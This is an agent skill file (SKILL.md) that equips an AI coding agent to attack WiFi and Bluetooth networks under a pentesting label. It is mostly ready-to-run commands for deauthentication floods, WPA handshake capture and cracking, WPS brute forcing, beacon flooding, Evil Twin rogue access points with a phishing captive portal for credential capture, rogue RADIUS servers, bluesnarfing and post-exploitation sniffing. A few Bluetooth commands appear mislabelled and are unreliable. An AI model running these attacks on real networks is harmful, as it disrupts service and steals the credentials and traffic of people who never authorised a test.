Agent skill

attacking-wireless-networks

Attack WiFi networks using WPA/WPA2 cracking, WPS exploitation, Evil Twin attacks, deauthentication, and wireless reconnaissance. Use when pentesting wireless networks or performing WiFi security assessments.

View SKILL.md on GitHub Repository
Stars 163
Forks 31

Install this agent skill to your Project

npx add-skill https://github.com/majiayu000/claude-skill-registry/tree/main/skills/security/attacking-wireless-networks-trilwu-secskills

SKILL.md

Attacking Wireless Networks

When to Use

  • WiFi penetration testing
  • Wireless network security assessment
  • WPA/WPA2/WPA3 cracking
  • Evil Twin and rogue AP attacks
  • Wireless reconnaissance

Setup and Tools

Enable Monitor Mode:

bash
# Check wireless interface
iwconfig
iw dev

# Enable monitor mode
airmon-ng start wlan0
# Creates wlan0mon

# Or manually
ip link set wlan0 down
iw wlan0 set monitor none
ip link set wlan0 up

# Disable interfering processes
airmon-ng check kill

Essential Tools:

  • aircrack-ng suite
  • Wireshark
  • Kismet
  • Reaver/Bully (WPS)
  • Wifite (automated)
  • hcxtools/hcxdumptool
  • Fluxion (Evil Twin)

WiFi Reconnaissance

Network Discovery:

bash
# Scan for networks
airodump-ng wlan0mon

# Scan specific channel
airodump-ng -c 6 wlan0mon

# Scan and save to file
airodump-ng -w capture wlan0mon

# Filter by BSSID
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon

Kismet:

bash
# Start Kismet
kismet

# Command line
kismet_server
kismet_client

# View in web UI
http://localhost:2501

WPA/WPA2 Attacks

Capture Handshake

bash
# Method 1: Wait for client connection
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Method 2: Deauth clients to force reconnect
# In another terminal
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Or target specific client
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon

# Verify handshake captured
aircrack-ng capture-01.cap
# Look for "1 handshake"

Crack Handshake

Aircrack-ng:

bash
# Crack with wordlist
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

# With specific ESSID
aircrack-ng -w wordlist.txt -e "NetworkName" capture-01.cap

Hashcat:

bash
# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap

# Crack WPA/WPA2 (mode 22000)
hashcat -m 22000 hash.hc22000 wordlist.txt

# With rules
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule

# Mask attack
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

John the Ripper:

bash
# Convert cap to john format
hccap2john capture-01.cap > hash.john

# Crack
john --wordlist=wordlist.txt hash.john

WPS Attacks

WPS Brute Force (Reaver)

bash
# Check WPS status
wash -i wlan0mon

# Reaver attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# With delay (less aggressive)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 5

# Pixie Dust attack (if vulnerable)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K

Bully (Alternative)

bash
# Standard attack
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon

# Pixie Dust
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon -d

Evil Twin Attacks

Fluxion

bash
# Start Fluxion
./fluxion.sh

# Follow prompts to:
# 1. Select target network
# 2. Capture handshake
# 3. Create fake AP
# 4. Launch captive portal
# 5. Capture credentials

Manual Evil Twin

bash
# Create rogue AP
hostapd rogue_ap.conf

# Sample hostapd.conf:
interface=wlan0mon
driver=nl80211
ssid=FreeWiFi
channel=6
hw_mode=g

# DHCP server
dnsmasq -C dnsmasq.conf

# Sample dnsmasq.conf:
interface=wlan0mon
dhcp-range=10.0.0.10,10.0.0.100,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8

# Captive portal (fake login page)
# Setup web server with phishing page

WPA3 Attacks

Dragonblood

bash
# Dragonblood toolkit
# Tests WPA3 vulnerabilities (CVE-2019-13377, CVE-2019-13456)

# Dictionary attack (downgrade to WPA2)
# If SAE (WPA3) and WPA2 transition mode enabled

Brute Force SAE

bash
# hashcat WPA3 (experimental)
hashcat -m 22000 hash.hc22000 wordlist.txt

Denial of Service

Deauthentication Attack

bash
# Deauth all clients
aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# Deauth specific client
aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon

# MDK3 (more aggressive)
mdk3 wlan0mon d -c 6

Beacon Flooding

bash
# MDK3 beacon flood
mdk3 wlan0mon b -f fake_aps.txt

# Create many fake APs
mdk3 wlan0mon b -n "FakeAP" -m -s 1000

Automated Tools

Wifite

bash
# Automated WiFi cracking
wifite

# Target WPA only
wifite --wpa

# Target WPS only
wifite --wps

# Specific BSSID
wifite -b AA:BB:CC:DD:EE:FF

# With custom wordlist
wifite --dict wordlist.txt

WiFi-Pumpkin (Rogue AP Framework)

bash
# Launch WiFi-Pumpkin
wifi-pumpkin

# Features:
# - Rogue AP creation
# - MITM attacks
# - DNS spoofing
# - Captive portal
# - Traffic sniffing

Enterprise WiFi (WPA-Enterprise)

EAP-TLS/PEAP Attacks

bash
# Capture EAP handshake
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w eap_capture wlan0mon

# Extract RADIUS traffic
tshark -r eap_capture-01.cap -Y "eap"

# Rogue RADIUS server
# hostapd-wpe (Wireless Pwnage Edition)
hostapd-wpe wpe.conf

# Crack captured hashes
asleap -r capture.dump -w wordlist.txt

Packet Injection Testing

bash
# Test injection capability
aireplay-ng --test wlan0mon

# Fake authentication
aireplay-ng --fakeauth 0 -a AA:BB:CC:DD:EE:FF -h YOUR:MAC wlan0mon

# ARP replay attack
aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF -h YOUR:MAC wlan0mon

Hidden SSID Discovery

bash
# Passive monitoring
airodump-ng wlan0mon
# Wait for client probe requests

# Active probing
mdk3 wlan0mon p -t AA:BB:CC:DD:EE:FF

# Deauth and capture beacon
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon

Bluetooth Attacks

Discovery

bash
# Scan for devices
hcitool scan

# Detailed info
hcitool info AA:BB:CC:DD:EE:FF

# Service discovery
sdptool browse AA:BB:CC:DD:EE:FF

BluetoothHunting

bash
# Bluesnarfing (file access)
bluesnarfer -b AA:BB:CC:DD:EE:FF

# Bluejacking (send messages)
echo "Message" | bluejack AA:BB:CC:DD:EE:FF

# PIN brute force
crackle -i hci0 -o pin.txt

Quick WiFi Pentest Workflow

  1. Monitor Mode - Enable monitor mode on wireless adapter
  2. Reconnaissance - Scan for networks (airodump-ng/kismet)
  3. Target Selection - Choose network (WPS-enabled for easy win)
  4. Handshake Capture - Deauth clients and capture 4-way handshake
  5. Cracking - Crack with hashcat/aircrack-ng
  6. Post-Exploitation - Connect and perform MITM/sniffing

Common Wins

  • WPS-enabled routers - Often crackable in minutes with Reaver
  • Weak passwords - Common WiFi passwords in rockyou.txt
  • WPA2 Transition Mode - Allows downgrade attacks
  • Open guest networks - No authentication required
  • Misconfigured Enterprise - Weak RADIUS authentication

Defense Detection

  • Wireless IDS (WIDS) may detect:
    • Deauthentication attacks
    • Rogue access points
    • Evil Twin attacks
    • WPS brute force attempts
  • Be aware of monitoring and physical security

References

Didn't find tool you were looking for?

Be as detailed as possible for better results